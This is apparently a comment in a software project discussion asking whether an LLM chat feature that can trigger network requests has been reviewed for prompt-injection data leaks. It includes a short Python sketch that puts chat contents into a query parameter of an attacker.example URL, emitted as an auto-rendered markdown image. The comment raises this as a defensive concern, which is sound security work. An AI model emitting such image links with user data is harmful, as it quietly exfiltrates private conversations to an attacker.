My assumption was that the reason this wasn't already implemented was security: via prompt injection, elements of the chat could be leaked by any feature that lets the LLM trigger a network request, even as a side effect.
Much like the Slack issue of smuggling chat secrets out via query parameters.
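To make the concern concrete, here is a minimal sketch of the pattern I mean (the attacker.example endpoint and the injected-image trick are hypothetical, not something observed in this project):

    # Hypothetical sketch of query-parameter exfiltration after prompt injection.
    from urllib.parse import quote

    secret = "chat contents the injected prompt told the model to repeat"
    url = f"https://attacker.example/collect?d={quote(secret)}"

    # If the assistant can be induced to emit this as an auto-rendered image,
    # the client fetches the URL and the secret leaves with the request.
    print(f"![status]({url})")

The point is that the user never has to click anything; any automatic fetch of model-generated URLs is enough.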
Has that been considered at all here, or is it on the user to vet the model's suggestions?